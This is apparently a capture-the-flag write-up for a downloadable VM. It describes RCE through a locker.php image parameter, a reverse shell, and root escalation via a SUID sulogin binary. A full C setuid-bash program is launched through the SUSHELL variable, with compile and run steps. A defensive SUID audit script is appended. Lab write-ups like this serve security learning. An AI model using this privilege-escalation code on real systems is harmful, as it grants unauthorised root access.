The machine can be downloaded here. An easy but interesting one.
An Nmap port scan shows that only port 80 is open.
The main page is very simple.
Checking the page source reveals locker.php.
Clicking "Model 1" redirects to locker.php and displays a picture.
The value "1" of the image parameter is obviously part of a filename, because changing it to 2 or 3 shows different pictures.
At first I thought it might be LFI. After some checks, I found it is actually RCE.
From there we can get a reverse shell.
Checking SUID binaries, we find an interesting file.
In fact, I enumerated the machine a lot but found no other way to escalate privileges, so we have to use sulogin.
First, if we execute sulogin directly, we only get a shell without root privileges.
Then, checking the man page of sulogin, we find a key environment variable, SUSHELL.
ENVIRONMENT: sulogin looks for the environment variable SUSHELL or sushell to determine what shell to start. If the environment variable is not set, it will try to execute root's shell from /etc/passwd. If that fails, it will fall back to /bin/sh.
Write a fake shell in C (system() needs stdlib.h, which the original snippet left out):
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/* sulogin runs SUSHELL with root privileges; become uid/gid 0 and spawn bash */
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
Compile it.
gcc -o exp exp.c
Upload it to /tmp on the VM, chmod +x it, then set the SUSHELL environment variable to the path of the uploaded binary.
Then run sulogin again, and we get ROOT!
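As an added defensive check (not part of the original writeup), here is a small POSIX shell audit that lists SUID binaries under a given root and flags sulogin, which picks its shell from SUSHELL as the man page above explains. The WATCHLIST, function names and the sample directory layout in the test are my own assumptions.

```shell
#!/bin/sh
# Added audit helper, not code from the writeup. Lists every SUID binary
# under $1 and flags names on WATCHLIST: programs that pick the shell they
# start from the environment (sulogin honours SUSHELL), so a SUID copy of
# them hands root to any local user.
WATCHLIST="sulogin"   # assumption: extend with other env-driven binaries

# audit_suid ROOT -> one line per SUID file: "<status> <path>"
audit_suid() {
  root="$1"
  find "$root" -type f -perm -4000 2>/dev/null | while IFS= read -r path; do
    name=$(basename "$path")
    status="ok"
    for w in $WATCHLIST; do
      [ "$name" = "$w" ] && status="DANGEROUS(env-driven-shell)"
    done
    printf '%s %s\n' "$status" "$path"
  done
}

# count_dangerous ROOT -> number of flagged SUID files (0 when none)
count_dangerous() {
  audit_suid "$1" | grep -c '^DANGEROUS' || true
}
```

Run `audit_suid /` on the target build; any DANGEROUS line is a misconfiguration to fix by clearing the SUID bit (sulogin is normally executed by init as root and does not need it).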